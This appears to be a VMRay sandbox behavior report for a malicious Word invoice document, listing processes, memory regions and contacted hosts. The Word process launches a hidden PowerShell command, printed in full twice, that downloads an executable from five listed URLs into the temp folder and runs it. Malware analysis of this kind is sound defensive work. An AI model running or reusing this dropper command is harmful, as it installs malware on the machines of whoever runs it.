Fake Microsoft Word Invoice Analysis | Grouped Behavior
Try VMRay Analyzer
Involved Hosts

Host Resolved to Country City Protocol
72.52.246.64 US Lansing IPPROTO_TCP
69.65.3.206 US Arlington Heights IPPROTO_TCP
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 135, Network: 0)
+
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:00:30, Reason: Analysis Target
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:02:29
OS Process Information
+
Information Value
PID 0x974
Parent PID 0x494 (c:\windows\explorer.exe)
File Name c:\program files (x86)\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE"
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00030fff Pagefile Backed Memory Readable False False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000060000 0x00060000 0x00063fff Pagefile Backed Memory Readable False False False
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable False False False
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable False False False
pagefile_0x0000000000090000 0x00090000 0x00090fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x00000000000a0000 0x000a0000 0x000a6fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000000b0000 0x000b0000 0x000b1fff Pagefile Backed Memory Readable, Writable False False False
private_0x00000000000c0000 0x000c0000 0x000fffff Private Memory Readable, Writable False False False
locale.nls 0x00100000 0x00166fff Memory Mapped File Readable False False False
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable False False False
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable False False False
pagefile_0x0000000000190000 0x00190000 0x00191fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001a0000 0x001a0000 0x001a1fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001b0000 0x001b0000 0x001b2fff Pagefile Backed Memory Readable False False False
private_0x00000000001c0000 0x001c0000 0x001cffff Private Memory False False False
pagefile_0x00000000001d0000 0x001d0000 0x001d2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001e0000 0x001e0000 0x001e2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000001f0000 0x001f0000 0x001f2fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000200000 0x00200000 0x00202fff Pagefile Backed Memory Readable False False False
private_0x0000000000210000 0x00210000 0x0022ffff Private Memory Readable, Writable False False False
private_0x0000000000230000 0x00230000 0x0023ffff Private Memory Readable, Writable False False False
private_0x0000000000240000 0x00240000 0x00240fff Private Memory Readable, Writable False False False
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable False False False
private_0x0000000000350000 0x00350000 0x0044ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000450000 0x00450000 0x00451fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000460000 0x00460000 0x00461fff Pagefile Backed Memory Readable False False False
private_0x0000000000470000 0x00470000 0x00481fff Private Memory Readable, Writable False False False
private_0x0000000000490000 0x00490000 0x004a1fff Private Memory Readable, Writable False False False
private_0x00000000004b0000 0x004b0000 0x004befff Private Memory Readable, Writable False False False
pagefile_0x00000000004c0000 0x004c0000 0x004c1fff Pagefile Backed Memory Readable False False False
private_0x00000000004d0000 0x004d0000 0x0054ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000550000 0x00550000 0x0062efff Pagefile Backed Memory Readable False False False
private_0x0000000000630000 0x00630000 0x00630fff Private Memory Readable, Writable False False False
pagefile_0x0000000000640000 0x00640000 0x00643fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000650000 0x00650000 0x00650fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000660000 0x00660000 0x00660fff Pagefile Backed Memory Readable False False False
private_0x0000000000670000 0x00670000 0x006affff Private Memory Readable, Writable False False False
private_0x00000000006b0000 0x006b0000 0x006b0fff Private Memory Readable, Writable False False False
pagefile_0x00000000006c0000 0x006c0000 0x006c1fff Pagefile Backed Memory Readable False False False
private_0x00000000006d0000 0x006d0000 0x007cffff Private Memory Readable, Writable False False False
pagefile_0x00000000007d0000 0x007d0000 0x00957fff Pagefile Backed Memory Readable False False False
private_0x0000000000960000 0x00960000 0x00960fff Private Memory Readable, Writable False False False
pagefile_0x0000000000970000 0x00970000 0x00970fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000980000 0x00980000 0x0098ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000990000 0x00990000 0x00b10fff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x00b20000 0x00deefff Memory Mapped File Readable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x00df0000 0x00e0dfff Memory Mapped File Readable False False False
private_0x0000000000e10000 0x00e10000 0x00e4ffff Private Memory Readable, Writable False False False
winword.exe 0x00e50000 0x01028fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000001030000 0x01030000 0x0242ffff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002430000 0x02430000 0x02822fff Pagefile Backed Memory Readable False False False
mso.dll 0x02830000 0x035e1fff Memory Mapped File Readable, Writable, Executable False False False
msxml6r.dll 0x035f0000 0x035f0fff Memory Mapped File Readable False False False
private_0x0000000003600000 0x03600000 0x0363ffff Private Memory Readable, Writable False False False
private_0x0000000003640000 0x03640000 0x0367ffff Private Memory Readable, Writable False False False
private_0x0000000003680000 0x03680000 0x0377ffff Private Memory Readable, Writable False False False
kernelbase.dll.mui 0x03780000 0x0383ffff Memory Mapped File Readable, Writable False False False
pagefile_0x0000000003840000 0x03840000 0x03841fff Pagefile Backed Memory Readable False False False
c_1255.nls 0x03850000 0x03860fff Memory Mapped File Readable False False False
private_0x0000000003870000 0x03870000 0x0396ffff Private Memory Readable, Writable False False False
private_0x0000000003970000 0x03970000 0x03a6ffff Private Memory Readable, Writable False False False
private_0x0000000003aa0000 0x03aa0000 0x03adffff Private Memory Readable, Writable False False False
private_0x0000000003af0000 0x03af0000 0x03b2ffff Private Memory Readable, Writable False False False
private_0x0000000003b40000 0x03b40000 0x03b7ffff Private Memory Readable, Writable False False False
private_0x0000000003b80000 0x03b80000 0x03b9efff Private Memory Readable, Writable False False False
private_0x0000000003ba0000 0x03ba0000 0x03bdffff Private Memory Readable, Writable False False False
private_0x0000000003be0000 0x03be0000 0x03c1ffff Private Memory Readable, Writable False False False
private_0x0000000003c20000 0x03c20000 0x03c3efff Private Memory Readable, Writable False False False
private_0x0000000003c40000 0x03c40000 0x03c40fff Private Memory Readable, Writable False False False
private_0x0000000003c50000 0x03c50000 0x03c6efff Private Memory Readable, Writable False False False
private_0x0000000003c70000 0x03c70000 0x03c90fff Private Memory Readable, Writable False False False
private_0x0000000003cb0000 0x03cb0000 0x03ceffff Private Memory Readable, Writable False False False
private_0x0000000003d10000 0x03d10000 0x03d10fff Private Memory Readable, Writable False False False
private_0x0000000003d20000 0x03d20000 0x03d9ffff Private Memory Readable, Writable False False False
private_0x0000000003da0000 0x03da0000 0x03ddffff Private Memory Readable, Writable False False False
private_0x0000000003de0000 0x03de0000 0x03dfefff Private Memory Readable, Writable False False False
private_0x0000000003e10000 0x03e10000 0x03e10fff Private Memory Readable, Writable False False False
private_0x0000000003e30000 0x03e30000 0x03e6ffff Private Memory Readable, Writable False False False
private_0x0000000003e70000 0x03e70000 0x03e70fff Private Memory Readable, Writable False False False
private_0x0000000003e90000 0x03e90000 0x03e90fff Private Memory Readable, Writable False False False
private_0x0000000003eb0000 0x03eb0000 0x03faffff Private Memory Readable, Writable False False False
private_0x0000000003fb0000 0x03fb0000 0x03fb0fff Private Memory Readable, Writable False False False
private_0x0000000003fc0000 0x03fc0000 0x03ffffff Private Memory Readable, Writable False False False
private_0x0000000004000000 0x04000000 0x0401efff Private Memory Readable, Writable False False False
private_0x0000000004020000 0x04020000 0x04020fff Private Memory Readable, Writable False False False
private_0x0000000004040000 0x04040000 0x0407ffff Private Memory Readable, Writable False False False
private_0x0000000004080000 0x04080000 0x040bffff Private Memory Readable, Writable False False False
private_0x00000000040c0000 0x040c0000 0x040defff Private Memory Readable, Writable False False False
private_0x00000000040f0000 0x040f0000 0x041effff Private Memory Readable, Writable False False False
private_0x0000000004210000 0x04210000 0x0430ffff Private Memory Readable, Writable False False False
pagefile_0x0000000004310000 0x04310000 0x0472bfff Pagefile Backed Memory Readable False False False
private_0x0000000004730000 0x04730000 0x0482ffff Private Memory Readable, Writable False False False
private_0x0000000004860000 0x04860000 0x04860fff Private Memory Readable, Writable False False False
staticcache.dat 0x04870000 0x0519ffff Memory Mapped File Readable False False False
private_0x00000000051b0000 0x051b0000 0x051effff Private Memory Readable, Writable False False False
private_0x0000000005200000 0x05200000 0x052fffff Private Memory Readable, Writable False False False
private_0x0000000005300000 0x05300000 0x0533ffff Private Memory Readable, Writable False False False
private_0x0000000005340000 0x05340000 0x0534ffff Private Memory Readable, Writable False False False
private_0x0000000005380000 0x05380000 0x0547ffff Private Memory Readable, Writable False False False
private_0x00000000054a0000 0x054a0000 0x054dffff Private Memory Readable, Writable False False False
private_0x00000000054e0000 0x054e0000 0x05527fff Private Memory Readable, Writable False False False
private_0x0000000005530000 0x05530000 0x0556ffff Private Memory Readable, Writable, Executable False False False
private_0x0000000005580000 0x05580000 0x055bffff Private Memory Readable, Writable False False False
private_0x00000000055c0000 0x055c0000 0x05607fff Private Memory Readable, Writable False False False
private_0x0000000005610000 0x05610000 0x0561ffff Private Memory Readable, Writable False False False
segoeui.ttf 0x05620000 0x0569efff Memory Mapped File Readable False False False
private_0x00000000056d0000 0x056d0000 0x056dffff Private Memory Readable, Writable False False False
private_0x0000000005730000 0x05730000 0x0576ffff Private Memory Readable, Writable, Executable False False False
pagefile_0x0000000005770000 0x05770000 0x05f6ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000005f90000 0x05f90000 0x05fcffff Private Memory Readable, Writable False False False
private_0x0000000005fd0000 0x05fd0000 0x060cffff Private Memory Readable, Writable False False False
private_0x00000000060d0000 0x060d0000 0x062cffff Private Memory Readable, Writable False False False
private_0x0000000006300000 0x06300000 0x0633ffff Private Memory Readable, Writable False False False
private_0x0000000006350000 0x06350000 0x0638ffff Private Memory Readable, Writable False False False
private_0x00000000063a0000 0x063a0000 0x063affff Private Memory Readable, Writable False False False
private_0x00000000063f0000 0x063f0000 0x0642ffff Private Memory Readable, Writable False False False
private_0x0000000006430000 0x06430000 0x0652ffff Private Memory Readable, Writable False False False
private_0x00000000065f0000 0x065f0000 0x066effff Private Memory Readable, Writable False False False
private_0x0000000006770000 0x06770000 0x0686ffff Private Memory Readable, Writable False False False
pagefile_0x0000000006870000 0x06870000 0x06c6ffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006d30000 0x06d30000 0x06d6ffff Private Memory Readable, Writable False False False
private_0x0000000006e10000 0x06e10000 0x06e4ffff Private Memory Readable, Writable False False False
private_0x0000000006e90000 0x06e90000 0x06f8ffff Private Memory Readable, Writable False False False
private_0x0000000006fd0000 0x06fd0000 0x0700ffff Private Memory Readable, Writable False False False
private_0x0000000007010000 0x07010000 0x0740ffff Private Memory Readable, Writable False False False
private_0x0000000007410000 0x07410000 0x0780ffff Private Memory Readable, Writable False False False
private_0x0000000007810000 0x07810000 0x07c10fff Private Memory Readable, Writable False False False
private_0x0000000007c20000 0x07c20000 0x08020fff Private Memory Readable, Writable False False False
private_0x0000000008030000 0x08030000 0x08430fff Private Memory Readable, Writable False False False
private_0x0000000008440000 0x08440000 0x0863ffff Private Memory Readable, Writable False False False
private_0x0000000008640000 0x08640000 0x08e3ffff Private Memory Readable, Writable False False False
private_0x0000000008e40000 0x08e40000 0x092fffff Private Memory Readable, Writable False False False
private_0x0000000009300000 0x09300000 0x096fffff Private Memory Readable, Writable False False False
private_0x0000000009700000 0x09700000 0x097fffff Private Memory Readable, Writable False False False
private_0x0000000009830000 0x09830000 0x0992ffff Private Memory Readable, Writable False False False
private_0x0000000009940000 0x09940000 0x09a3ffff Private Memory Readable, Writable False False False
private_0x0000000009a40000 0x09a40000 0x09b3ffff Private Memory Readable, Writable False False False
private_0x0000000009b80000 0x09b80000 0x09c7ffff Private Memory Readable, Writable False False False
private_0x0000000009c80000 0x09c80000 0x09d7ffff Private Memory Readable, Writable False False False
private_0x0000000009ec0000 0x09ec0000 0x09fbffff Private Memory Readable, Writable False False False
private_0x0000000009fe0000 0x09fe0000 0x0a0dffff Private Memory Readable, Writable False False False
private_0x000000000a140000 0x0a140000 0x0a23ffff Private Memory Readable, Writable False False False
office.odf 0x0a240000 0x0a3f8fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000035c80000 0x35c80000 0x35c8ffff Private Memory Readable, Writable, Executable False False False
cscapi.dll 0x67370000 0x6737afff Memory Mapped File Readable, Writable, Executable False False False
srvcli.dll 0x67380000 0x67398fff Memory Mapped File Readable, Writable, Executable False False False
For performance reasons, the remaining 412 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Thread (1)
+
Operation Additional Information Success Count Logfile
Create process_name = c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Memory (94)
+
Operation Additional Information Success Count Logfile
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Free c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Protect c:\program files (x86)\microsoft office\root\office16\winword.exe True 1
Fn
Module (31)
+
Operation Additional Information Success Count Logfile
Load module_name = VBE7.DLL, base_address = 1960968192 True 15
Fn
Get Address module_name = Unknown module name, function = _MsoMultiByteToWideChar@24, address_out = 1727055465 True 1
Fn
Get Address module_name = Unknown module name, function = 712, address_out = 1963130104 True 3
Fn
Get Address module_name = Unknown module name, function = 709, address_out = 1963128984 True 3
Fn
Get Address module_name = Unknown module name, function = 717, address_out = 1963062441 True 3
Fn
Get Address module_name = Unknown module name, function = 616, address_out = 1961510594 True 3
Fn
Get Address module_name = Unknown module name, function = 600, address_out = 1961329478 True 3
Fn
Process #2: powershell.exe
(Host: 511, Network: 104)
+
Information Value
ID #2
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Initial Working Directory C:\Users\hJrD1KOKY DS8lUjv\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:02:59, Reason: Terminated by Timeout
Monitor Duration 00:01:58
OS Process Information
+
Information Value
PID 0xa94
Parent PID 0x974 (c:\program files (x86)\microsoft office\root\office16\winword.exe)
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'http://carbeyondstore.com/cianrft/,http://pxpgraphics.com/espzyurt/,http://nonieuro.com/xauqt/,http://studiogif.com.br/jedtvuziky/,http://motorgirlstv.com/kdm/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Exception.Message;}}
Is Created or Modified Executable False
Integrity Level Medium
Username 1R6PFH\hJrD1KOKY DS8lUjv
Groups
  • 1R6PFH\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000e539 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000070000 0x00070000 0x00071fff Pagefile Backed Memory Readable, Writable True False False
powershell.exe.mui 0x00080000 0x00082fff Memory Mapped File Readable, Writable False False False
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x0014ffff Private Memory Readable, Writable True False False
locale.nls 0x00150000 0x001b6fff Memory Mapped File Readable False False False
private_0x00000000001c0000 0x001c0000 0x001c0fff Private Memory Readable, Writable True False False
private_0x00000000001d0000 0x001d0000 0x001d0fff Private Memory Readable, Writable True False False
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable True False False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000200000 0x00200000 0x00200fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000210000 0x00210000 0x00211fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000220000 0x00220000 0x00220fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False
private_0x0000000000280000 0x00280000 0x0037ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000380000 0x00380000 0x00380fff Pagefile Backed Memory Readable True False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db 0x00390000 0x003adfff Memory Mapped File Readable True False False
pagefile_0x00000000003b0000 0x003b0000 0x003b0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000003c0000 0x003c0000 0x003c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x0040ffff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000410000 0x00410000 0x00410fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory True False False
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000440000 0x00440000 0x005c7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000005d0000 0x005d0000 0x00750fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000760000 0x00760000 0x01b5ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001b60000 0x01b60000 0x01c3efff Pagefile Backed Memory Readable True False False
private_0x0000000001c40000 0x01c40000 0x01c4ffff Private Memory True False False
private_0x0000000001c50000 0x01c50000 0x01c5ffff Private Memory True False False
private_0x0000000001c60000 0x01c60000 0x01c6ffff Private Memory True False False
private_0x0000000001c70000 0x01c70000 0x01c7ffff Private Memory True False False
private_0x0000000001c80000 0x01c80000 0x01c8ffff Private Memory True False False
private_0x0000000001c90000 0x01c90000 0x01c9ffff Private Memory Readable, Writable True False False
l_intl.nls 0x01ca0000 0x01ca2fff Memory Mapped File Readable False False False
private_0x0000000001cb0000 0x01cb0000 0x01cb0fff Private Memory Readable, Writable True False False
private_0x0000000001cc0000 0x01cc0000 0x01cfffff Private Memory Readable, Writable True False False
sortdefault.nls 0x01d00000 0x01fcefff Memory Mapped File Readable False False False
private_0x0000000001fd0000 0x01fd0000 0x020cffff Private Memory Readable, Writable True False False
sorttbls.nlp 0x020d0000 0x020d4fff Memory Mapped File Readable False False False
microsoft.wsman.runtime.dll 0x020e0000 0x020e7fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x00000000020f0000 0x020f0000 0x020f0fff Pagefile Backed Memory Readable True False False
private_0x0000000002100000 0x02100000 0x0213ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002140000 0x02140000 0x02140fff Pagefile Backed Memory Readable True False False
private_0x0000000002170000 0x02170000 0x021affff Private Memory Readable, Writable True False False
pagefile_0x00000000021b0000 0x021b0000 0x025a2fff Pagefile Backed Memory Readable True False False
